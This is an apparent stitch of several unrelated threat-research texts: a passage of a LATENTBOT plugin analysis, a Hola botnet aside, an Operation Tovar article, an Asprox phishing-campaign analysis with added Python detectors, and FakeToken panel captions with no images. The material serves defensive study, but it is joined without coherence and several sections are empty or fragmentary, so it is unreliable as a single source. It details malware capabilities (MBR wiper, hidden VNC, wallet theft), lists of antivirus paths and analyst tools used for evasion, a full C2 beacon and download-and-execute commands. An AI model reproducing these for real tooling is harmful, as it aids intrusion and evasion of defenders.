2.    QdW/DoI2F9J = Security
3.    RRrIibQs+WzRVv5B+9iIys+17huxID = Remote_desktop_service
4.    VRWVBM6UtH6F+7UcwkBKPB = Vnc_hide_desktop
5.    zRlBb9ofmNVErtdu = Pony_Stealer

The registry values shown at the bottom of Figure 19 have a specific purpose depending on the plugin being used. The values can be used as status or integrity-check flags or used to store encoded binaries.

Figure 20 is a diagram showing how the plugins will be loaded:



Figure 20: Plugins Architecture

InjectionHelper

A new DLL (InjectionHelper, see Figure 20) is decoded from the resources of the sixth stage Delphi binary and loaded to the current process via BTMemoryLoader, which will eventually load (via the jMex export) the main plugin BOT_ENGINE.
The main purpose of InjectionHelper is to load svchost.exe and replace it in memory – via the process hollowing technique – with the binary supplied as an argument. This DLL is actually used by other plugins any time a new binary needs to be loaded in memory.

Once InjectionHelper loads the BOT_ENGINE plugin, it will re-inject itself into new instances of svchost.exe multiple times before commencing execution, as seen in Figure 21.

 
Figure 21: BOT_ENGINE process hollowing chain

Plugins Description

BOT_ENGINE & SECURITY

BOT_ENGINE is the main plugin responsible for loading the rest of the plugins. The loading technique is the same as previously documented using the BTMemoryLoader Library. BOT_ENGINE communicates closely with the SECURITY module. The SECURITY module checks the system to see if any antivirus solution was installed, using a list of AV products’ default installation paths (see Appendix 1). This list is encrypted with the algorithm from Figure 16 using the modifier 0xBB8.

If an AV is found on the system, the callback will include a GET parameter av=<number> (e.g., Avast will be av=1).

There is also a check for GPUs with EnumDisplayDevice that tries to detect display cards from NVidia, ATI and Radeon and report the result with the vidtype parameter, which has three possible values:
•    vidtype=1  for NVidia
•    vidtype=2   for ATI or Radeon
•    vidtype=0 for none of the above

BOT_ENGINE is a Delphi program similar to the sixth stage Delphi loader, but with patched stubs and new threads to do specific tasks. It extracts data from resources and verifies their signature using a public key embedded in the malware.
                                             
Extracting the public key

A key BLOB is imported via the CryptImportKey API. The BLOB contains a 2048-bit RSA public key used to verify signatures.

Following the BLOB header, we can find the 2048-bit RSA public key, as shown in Figure 22.

 
Figure 22: Public key BLOB Structure in memory

Other GET parameters that may be sent are shown in Table 3.


Table 3: Other GET Parameters

After BOT_ENGINE is successfully installed and all the different checks are performed, a query is sent back to the CnC with the status of plugin installation along with any errors identified. The plugin GET parameter holds the plugin name.

Here is an example of a plain text beacon after the BOT_ENGINE plugin is successfully installed:

forum?data=US-20-164346373561&ver=4006&os=2&av=19&acs=&x64=0&gr=engine-1.7.1.20-s&li=load-1.7.1.20&plugins=Bot_Engine-881384-8&errcode=0&bk=0&note=0&dom=1&sockslog=0&vidtype=0&random=deabaotabf

Supported BOT_ENGINE commands are listed in Table 4:


Table 4: BOT_ENGINE CnC Commands

PONY Plugin

This plugin is a recent version of Pony Stealer 2.0 malware that comes with BITCOIN support to steal Bitcoin wallets as seen in Figure 23.



              
Figure 23: Bitcoin wallet

It looks for wallets for different cryptocurrencies (similar to VNC Plugin). Refer to List of Bitcoin Wallets and Currencies 1.

VNC Plugin

The VNC Plugin is actually more than what its name suggests - it has multiple features:

•    Implements a keylogger
•    ICMP Requests
•    MBR Wiper
•    Hidden VNC Remote Desktop
•    Manipulate the desktop
•    Intercept mouse events

Supported VNC module commands are listed in Table 5.

Table 5: VNC Plugin BOT Commands

Note: For every command executed, the BOT will send the encrypted status result to the CnC.

VNC Plugin command: killosanduninstalls

When this command is executed, the following steps will occur:

1.    The malicious MBR wiper is extracted and decoded from the VNC plugin’s resources and then injected into a new instance of svchost.exe via the InjectionHelper. The MBR Wiper overwrites the first 512 bytes of the hard drive represented by \\.\Physicaldrive0 and exits the injected process.
2.    The parent process will proceed to delete any traces of the malware from the registry and file system.
3.    Running malicious processes are terminated.
4.    Then the status message “kill os function started + uninstall + shutdown mashine from 10 sec …” is sent to the CnC
5.    Finally a reboot is forced via the ExitWindowsEx API leaving the infected PC useless. A quick overview of this process is shown in Figure 24.


 
Figure 24: Killing the infected PC

The MD5 of the MBR Wiper (4d0b14024d4a7ffcff25f2a3ce337af8) was submitted to VirusTotal 7 times - from Russia - beginning in July 2013 and it has zero AV detections.

Running VNC

By running the VNC Plugin module on a system, it is possible to simply watch the end user (the victim, in this case) while going unnoticed. This differs from a normal RDP session, which would log off the end user and make the activity easy to identify.

The encoded VNC Plugin is stored in the registry under the key:

HKCU\Software\Google\Update\network\secure\

This key stores multiple encrypted subkeys as shown in Figure 19. The binary will be decoded and injected into svchost.exe via the InjectionHelper. The IP to connect to is encoded in the Resources section.

Before injecting the VNC Plugin, LATENTBOT will search for the following VNC processes running in the system and kill them to avoid conflicts:

•    tvnserver.exe – TightVNC Software
•    winvnc.exe – UltraVNC Software
•     vncserver.exe – RealVNC Software
•    vncservice.exe – RealVNC Software

VNC Plugin command: getinstallpluginlist

When this command is executed, the plugin list will be extracted from the registry, as already described. The registry values will be separated by a dash and the plugins by a comma. The data will then be encrypted and sent to the CnC server.

Figure 25 is an example of this decrypted plugin list:

 
Figure 25: Plugin list data decrypted in memory

VNC Plugin command: findgold

This searches the registry recursively starting at HKCU\Software\Classes for strings such as Bitcoin or TrueCrypt. It also searches the file system starting at %APPDATA%\Roaming and $APPDATA\Roaming\Bitcoin for wallet.dat, MultiBit or Electrum. See Figure 23 in the appendix for a full list of search terms.

VNC Plugin command: sendCtrlAltDel

This functionality is implemented by loading as_sas32.dll and calling its sendCtrlAltDel export.

Information Gathering

The plugin will gather system information and report it to the CnC server only, without using this to stop a process, which might trigger an alert.

The section Searching for malware analyst tools in Appendix 1 lists the program names and processes that LATENTBOT is searching for. Keywords for SoftICE or filemon (which are retired tools) suggest this specific module was created a long time ago. A specific ID is assigned to every identified item and reported to the CnC server.

The same list of AV products used by the BOT_ENGINE plugin was found in this one.

RDP Plugin

The built-in RDP client provides easy remote administration of the victim computer to the attackers, although this method would be more intrusive (potentially more noticeable to the victim) than the VNC Plugin.

Conclusion

In this paper we presented different plugins being used by LATENTBOT. Its architectural design allows the payloads to be easily updated with new functionalities, so we will be tracking the deployment of other plugins closely.

Although LATENTBOT is highly obfuscated, due to the multiple process injections performed, it is noisy enough to be easily detected in memory with a proper behavior-based solution. Outbound callback tracking and blocking is also mandatory in cases when the malware was able to bypass the security controls in place.

Acknowledgements:

Thanks to Nart Villeneuve for his help during this research.

[1] https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html

[2] Original version can be found here: https://github[.]com/strazzere/android-scripts/blob/master/Decoders/TauSpy-iBanking/rollingobfuscation.java

Appendix 1

IOCs:

HBI:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load  = %AppData%\Roaming\aFwLiiV\dlrznz68mkaa.exe

The binary is a copy of aya.exe

HKCU\Software\Adobe\Adobe Acrobat\data = <random_value>
HKCU\Software\Google\Update\network\secure

With 0 to 5 subkeys representing modules names:
HKCU\Software\Google\Update\network\secure\hdtWD3zyxMpSQB
HKCU\Software\Google\Update\network\secure\QdW/DoI2F9J
HKCU\Software\Google\Update\network\secure\RRrIibQs+WzRVv5B+9iIys+17huxID
HKCU\Software\Google\Update\network\secure\VRWVBM6UtH6F+7UcwkBKPB
HKCU\Software\Google\Update\network\secure\zRlBb9ofmNVErtdu
HKCU\Software\Google\Update\network\update
HKCU\Software\Google\Common\Rlz\Events\Update
HKCU\Software\Google\Common\Rlz\Events\EventsID


NBI:

CnC IPs (Some of them are compromised legitimate websites):


LATENTBOT Samples



BOT_ENGINE Plugin 1: The list of default installation paths of popular AV

Documents and Settings\All Users\Application Data\Agnitum
Documents and Settings\All Users\Application Data\avg10
Documents and Settings\All Users\Application Data\avg8
Documents and Settings\All Users\Application Data\avg9
Documents and Settings\All Users\Application Data\Avira
Documents and Settings\All Users\Application Data\Doctor Web
Documents and Settings\All Users\Application Data\ESET
Documents and Settings\All Users\Application Data\f-secure
Documents and Settings\All Users\Application Data\G DATA
Documents and Settings\All Users\Application Data\Kaspersky Lab\
Documents and Settings\All Users\Application Data\McAfee
Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware
Documents and Settings\All Users\Application Data\PC Tools
Documents and Settings\All Users\Application Data\Symantec
Documents and Settings\All Users\Application Data\Trend Micro
Documents and Settings\All Users\AVAST Software
Documents and Settings\NetworkService\Local Settings\Application Data\F-Secure
Program Files\Agnitum
Program Files\Alwil Software
Program Files\AVAST Software
Program Files\AVG
Program Files\Avira
Program Files\BitDefender9
Program Files\Common Files\Doctor Web
Program Files\Common Files\G DATA
Program Files\Common Files\PC Tools
Program Files\DrWeb
Program Files\ESET
Program Files\F-Secure Internet Security
Program Files\FRISK Software
Program Files\Kaspersky Lab
Program Files\McAfee
Program Files\Microsoft Security Essentials
Program Files\Norton AntiVirus
Program Files\Panda Security
Program Files\PC Tools Internet Security

Program Files\Symantec
Program Files\Trend Micro
Program Files\Vba32


VNC Plugin:

Searching for malware analyst tools

 OLLYDBG
 DBG
 W32DSM
 drivers\sice.sys
 drivers\ntice.sys
 drivers\syser.sys
 drivers\winice.sys
 drivers\sice.vxd
 drivers\winice.vxd
 winice.vxd
 vmm32\winice.vxd
 sice.vxd
 hgfs.sys
 vmhgfs.sys
 prleth.sys
 prlfs.sys
 prlmouse.sys
 prlvideo.sys
 prl_pv32.sys
 vpc-s3.sys
 vmsrvc.sys
 vmx86.sys
 vmnet.sys
 \\.\SICE
 \\.\SIWVID
 \\.\NTICE
 \\.\TRW
 \\.\TWX
 \\.\ICEEXT
 \\.\Syser
 \\.\SyserDbgMsg
 \\.\SyserBoot
 SbieDll.dll
 api_log.dll
 dir_watch.dll
 dbghelp.dll
 pstorec.dll
 Sandbox
 honeyq
 vmware
 nepenthes
 snort
 andyd
 c:\analysis
 joeboxcontrol.exe
 wireshark.exe
 regmon.exe
 filemon.exe
 procmon.exe
 SandboxieRpc
 SandboxieDcomLaunch.exe
 VBoxService.exe
 VMwareTray.exe
 VMwareService.exe
 VMwareUser.exe
 xenservice.exe
 sniff_hit.exe
 sysAnalyzer.exe
 procexp.exe
 autoruns.exe
 prl_cc.exe
 LoadOrd.exe
 Diskmon.exe
 RootkitRevealer.exe
 portmon.exe
 Tcpview.exe
 Dbgview.exe
 procdump.exe
 cfp.exe


PONY STEALER Plugin: List of Bitcoin Wallets and Currencies 1

Bitcoin Currencies:

Bitcoin
Litecoin
Namecoin
Terracoin
PPcoin
Primecoin
Feathercoin
Novacoin
Freicoin
Devoin
Franko
Megacoin
Quarkcoin
Worldcoin
Infinitecoin
Ixcoin
Anoncoin
BBQcoin
Digitalcoin
Mincoin
Goldcoin
Yacoin
Zetacoin
Fastcoin
I0coin
Tagcoin
Bytecoin
Florincoin
Phoenixcoin
Luckycoin
Craftcoin
Junkcoin

Wallets:

Armory wallet
Electrum wallet
Multibit wallet

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately after I hit "publish", I spotted this article pop up on ZDNet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long suffering colleagues. In this case though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid... but a botnet client means you might be part of something illegal, and you'd never know the difference.

Operation Tovar: The Latest Attempt to Eliminate Key Botnets

Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2, 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted under their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

Gameover ZeuS

Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.

Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.

ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.

CryptoLocker

Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without backups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, held on the criminals’ servers, encrypted files probably cannot be decrypted.

The Target

Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

The Takeover

Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets? and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging: attempted takeovers of Kelihos have been undone after only two weeks.

The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.

A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware

Executive Summary

FireEye Labs has been tracking a recent spike in malicious email detections that we attribute to a campaign that began in 2013. While malicious email campaigns are nothing new, this one is significant in that we are observing mass-targeting attackers adopting the malware evasion methods pioneered by the stealthier APT attackers. And this is certainly a high-volume business, with anywhere from a few hundred to ten thousand malicious emails sent daily – usually distributing between 50 and 500,000 emails per outbreak.

Through the FireEye Dynamic Threat Intelligence (DTI) cloud, FireEye Labs discovered that each and every major spike in email blasts brought a change in the attributes of their attack. These changes have made it difficult for anti-virus, IPS, firewalls and file-based sandboxes to keep up with the malware and effectively protect endpoints from infection. Worse, if past is prologue, we can expect other malicious, mass-targeting email operators to adopt this approach to bypass traditional defenses.

This blog will cover the trends of the campaign, as well as provide a short technical analysis of the payload.

Campaign Details

Figure 1: Attack Architecture

The campaign first appeared in late December of 2013 and has since been seen in fairly cyclical patterns each month. It appears that the threat actors behind this campaign are fairly responsive to published blogs and reports surrounding their malware techniques, tweaking their malware accordingly to continuously try and evade detection with success.

In late 2013, malware labeled as Kuluoz, the specific spam component of the Asprox botnet, was discovered to be the main payload of what would become the first malicious email campaign. Since then, the threat actors have continuously tweaked the malware by changing its hardcoded strings, remote access commands, and encryption keys.

Previously, Asprox malicious email campaigns targeted various industries in multiple countries and included a URL link in the body. The current version of Asprox instead uses a simple zipped email attachment containing the malicious payload, an .exe file. Figure 2 below shows a sample message, while Figure 3 is an example of the various court-related email headers used in the campaign.

Figure 2: Email Sample

Figure 3: Email Headers

Some of the recurring themes that Asprox used include airline tickets, postal services and license keys. In recent months, however, the court notice and court request-themed emails appear to be the most successful phishing theme for the campaign.

The following list contains examples of email subject variations, specifically for the court notice theme:

  • Urgent court notice
  • Notice to Appear in Court
  • Notice of appearance in court
  • Warrant to appear
  • Pretrial notice
  • Court hearing notice
  • Hearing of your case
  • Mandatory court appearance

The campaign appeared to increase in volume during the month of May. Figure 4 shows the increase in activity of Asprox compared to other crimewares towards the end of May specifically. Figure 5 highlights the regular monthly pattern of overall malicious emails. In comparison, Figure 6 is a compilation of all the hits from our analytics.

Figure 4: Worldwide Crimeware Activity

Figure 5: Overall Asprox Botnet Tracking

Figure 6: Asprox Botnet Activity, Unique Samples

These malicious email campaign spikes revealed that FireEye appliances, with the support of DTI cloud, were able to provide a full picture of the campaign (blue), while only a fraction of the emailed malware samples could be detected by various Anti-Virus vendors (yellow).

Figure 7: FireEye Detection vs. Anti-Virus Detection

By the end of May, we observed a big spike in the unique binaries associated with this malicious activity. Compared to the previous days, where the malware authors used just 10-40 unique MD5s or fewer per day, we saw about 6400 unique MD5s sent out on May 29th. That is a 16,000% increase in unique MD5s over the usual malicious email campaign we’d observed. Compared to other recent email campaigns, Asprox uses an unusually high volume of unique samples.

Figure 8: Asprox Campaign Unique Sample Tracking

Figure 9: Geographical Distribution of the Campaign

Figure 10: Distribution of Industries Affected

Brief Technical Analysis

Figure 11: Attack Architecture

Infiltration

The infiltration phase consists of the victim receiving a phishing email with a zipped attachment containing the malware payload disguised as an Office document. Figure 11 is an example of one of the more recent phishing attempts.

Figure 12: Malware Payload Icon

Evasion

Once the victim executes the malicious payload, it starts an svchost.exe process and injects its code into the newly created process. Once loaded into memory, the injected code is unpacked as a DLL. Note that Asprox uses a hardcoded mutex that can be found in its strings.

  1. Mutex creation (hardcoded value "2GVWNQJz1")
  2. Create an svchost.exe process
  3. Inject code into svchost.exe

Entrenchment

Once the DLL is running in memory, it creates a copy of itself in the following location:

%LOCALAPPDATA%/[8 CHARACTERS].EXE

Example filename:

%LOCALAPPDATA%\lwftkkea.exe

It’s important to note that the process first checks whether it is already registered in the startup registry key, so a compromised endpoint will have the following registry key populated with the dropped executable:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
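A host-side check for this persistence artifact, added here as an example and not part of the FireEye analysis: it flags Run-key values that point at an 8-character .exe sitting directly in %LOCALAPPDATA%. The sample Run values are constructed; reading the live key uses the standard winreg module and only works on Windows.

```python
import re

# Asprox (per the analysis above) copies itself to %LOCALAPPDATA%\<8 chars>.exe
# (sample: lwftkkea.exe) and registers that path in the per-user Run key.
RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Match the value whether it holds the unexpanded %LOCALAPPDATA% variable or an
# already-expanded C:\Users\<user>\AppData\Local path, optionally quoted.
_DROP_RE = re.compile(
    r'^"?(?:%LOCALAPPDATA%|[a-z]:\\users\\[^\\]+\\appdata\\local)'
    r'\\[a-z0-9]{8}\.exe"?$',
    re.IGNORECASE,
)


def is_asprox_like(value_data: str) -> bool:
    """True if a Run value points at an 8-character .exe directly in %LOCALAPPDATA%."""
    return _DROP_RE.match(value_data.strip()) is not None


def scan_run_values(values: dict) -> list:
    """Return the names of Run values whose data matches the drop pattern."""
    return [name for name, data in values.items() if is_asprox_like(data)]


def read_live_run_values() -> dict:
    """Read the real HKCU Run key; Windows only (winreg is absent elsewhere)."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_SUBKEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once no values remain
                break
            values[name] = str(data)
            index += 1
    return values


# Constructed sample of HKCU Run values (not taken from a real host).
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "lwftkkea": r"%LOCALAPPDATA%\lwftkkea.exe",
    "Updater": r"C:\Users\alice\AppData\Local\qzpmkxva.exe",
    "Notepad": r"C:\Windows\System32\notepad.exe",
}

if __name__ == "__main__":
    for name in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"suspicious Run value {name!r}: {SAMPLE_RUN_VALUES[name]}")
```

On a live host, replace SAMPLE_RUN_VALUES with read_live_run_values(); a hit is a lead to triage (hash the file, check the mutex), not proof of infection on its own.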

Exfiltration/Communication

The malware uses several encryption layers to communicate with the command and control (C2) nodes. The communication runs over an SSL session negotiated with RSA (i.e. PROV_RSA_FULL) through the Microsoft Base Cryptographic Provider, while the payloads themselves are RC4 encrypted. Each sample carries a default hardcoded RSA public key.


First Communication Packet

The annotations in the original figure mark the POST path as the RC4 encrypted URL and the <id> value as the bot ID.

POST /5DBA62A2529A51B506D197253469FA745E7634B4FC HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: <host useragent>
Host: <host ip>:443
Content-Length: 319
Cache-Control: no-cache

<knock><id>5DBA62A247BC1F72B98B545736DEA65A</id><group>0206s</group><src>3</src><transport>0</transport><time>1881051166</time><version>1537</version><status>0</status><debug>none<debug></knock>
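Network-side detection logic for the beacon shape above, added as an example rather than taken from the post: it matches a POST with a hex-only path, a form content type and a <knock> body carrying a 32-hex-character id. The request log is constructed; the first entry reproduces the packet shown above, and the fields are pulled with a tolerant regex because the captured sample closes <debug> with a second opening tag, which a strict XML parser would reject.

```python
import re

# Shape of the first Asprox beacon: POST to a long hexadecimal path (the
# RC4-encrypted URL), form-urlencoded content type, <knock> body with the bot ID.
_HEX_PATH_RE = re.compile(r"^/[0-9A-Fa-f]{32,}$")
_KNOCK_RE = re.compile(r"<knock>(.*?)</knock>", re.DOTALL)
_FIELD_RE = re.compile(r"<(\w+)>([^<]*)<")   # tolerant of <debug>none<debug>
_BOT_ID_RE = re.compile(r"^[0-9A-Fa-f]{32}$")


def parse_knock(body: str):
    """Return the <knock> fields as a dict, or None if no knock record is present."""
    m = _KNOCK_RE.search(body)
    if m is None:
        return None
    return dict(_FIELD_RE.findall(m.group(1)))


def is_asprox_knock(method: str, path: str, headers: dict, body: str) -> bool:
    """True when method, path, content type and body all match the beacon shape."""
    if method.upper() != "POST" or _HEX_PATH_RE.match(path) is None:
        return False
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    if not ctype.lower().startswith("application/x-www-form-urlencoded"):
        return False
    fields = parse_knock(body)
    return fields is not None and _BOT_ID_RE.match(fields.get("id", "")) is not None


def scan_requests(requests: list) -> list:
    """Return the labels of logged requests that look like Asprox knocks."""
    return [r["label"] for r in requests
            if is_asprox_knock(r["method"], r["path"], r["headers"], r["body"])]


# Constructed request log: the first entry is the packet from the post, the
# rest is benign traffic added for contrast (203.0.113.5 is a documentation IP).
SAMPLE_REQUESTS = [
    {"label": "knock", "method": "POST",
     "path": "/5DBA62A2529A51B506D197253469FA745E7634B4FC",
     "headers": {"Content-Type": "application/x-www-form-urlencoded",
                 "Host": "203.0.113.5:443"},
     "body": "<knock><id>5DBA62A247BC1F72B98B545736DEA65A</id><group>0206s</group>"
             "<src>3</src><transport>0</transport><time>1881051166</time>"
             "<version>1537</version><status>0</status><debug>none<debug></knock>"},
    {"label": "login", "method": "POST", "path": "/api/login",
     "headers": {"Content-Type": "application/json"},
     "body": '{"user": "alice"}'},
    {"label": "hex-path-no-knock", "method": "POST",
     "path": "/0123456789abcdef0123456789abcdef",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "a=1&b=2"},
]

if __name__ == "__main__":
    print(scan_requests(SAMPLE_REQUESTS))
```

Because the session is SSL, this only applies where the proxy or sensor sees decrypted traffic; otherwise the hex-only path on port 443 is the only observable part.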

C2 Commands

In comparison to the campaign at the end of 2013, the current campaign uses one of the newer versions of the Asprox family where threat actors added the command “ear.”

The command dispatch in the decompiled sample is a chain of case-insensitive string comparisons against the received command (the excerpt ends at the "upd" check):

if ( wcsicmp(Str1, L"idl") )
{
    if ( wcsicmp(Str1, L"run") )
    {
        if ( wcsicmp(Str1, L"rem") )
        {
            if ( wcsicmp(Str1, L"ear") )
            {
                if ( wcsicmp(Str1, L"rdl") )
                {
                    if ( wcsicmp(Str1, L"red") )
                    {
                        if ( !wcsicmp(Str1, L"upd") )

C2 command   Description
idl          Idle the process and wait for commands
run          Download from a partner site and execute from a specified path
rem          Remove itself
ear          Download another executable and create an autorun entry
rdl          Download, inject into svchost, and run
upd          Download and update
red          Modify the registry

C2 Campaign Characteristics


For the two major malicious email campaign spikes in April and May of 2014, separate sets of C2 nodes were used for each major spike.


Conclusion

The data reveals that each of the Asprox botnet’s malicious email campaigns changes its method of luring victims and C2 domains, as well as the technical details on monthly intervals. And, with each new improvement, it becomes more difficult for traditional security methods to detect certain types of malware.

Acknowledgements:

Nart Villeneuve, Jessa dela Torre, and David Sancho. Asprox Reborn. Trend Micro. 2013. http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf

Android/FakeToken.A

OTP forwarder dumped months ago.

Panel screenshots (images not reproduced): Login, Statistics, Bots, Bot, Passwords, Send a command, Commands sent, Apps, Apps builder.

MD5s:

Panel screenshots (images not reproduced): App settings, Settings.

Second panel, a bit different; it looks like a 'test' one.

Panel screenshots (images not reproduced): Statistics, Phone, Phone search, Settings.

RSA Security also talked about it here.